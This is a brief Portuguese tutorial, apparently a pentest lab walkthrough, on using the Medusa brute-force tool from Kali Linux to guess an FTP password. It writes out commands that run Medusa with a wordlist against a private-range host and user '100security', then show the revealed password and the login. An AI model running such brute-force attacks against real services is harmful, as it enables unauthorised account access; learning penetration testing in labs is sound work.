Medusa é uma ferramenta de brute-force para a realização de ataques remotos, possui diversos módulos para realizar ataques.
Site Oficial: foofus.net
Passo 01
Listar módulos disponíveis para ataque, neste exemplo iremos utilizar o módulo FTP
root@kali:~# medusa -q | more
medusa : Ferramenta -q : Lista os módulos disponíveis
Passo 02
Crie o arquivo senhas.txt contendo possíveis senhas
Passo 03
Realizando o ataque, como segue abaixo a senha do usuário 100security foi revelada : 123456
root@kali:~# medusa -h 10.10.10.123 -u 100security -P senhas.txt -M ftp
medusa : Ferramenta -h : Define o host alvo -u : Define o usuário a ser atacado -P : Define o arquivo Wordlist -M : Define o módulo
Passo 04
Acesso ao ftp com o usuário 100security e senha 123456
root@kali:~# ftp 10.10.10.123
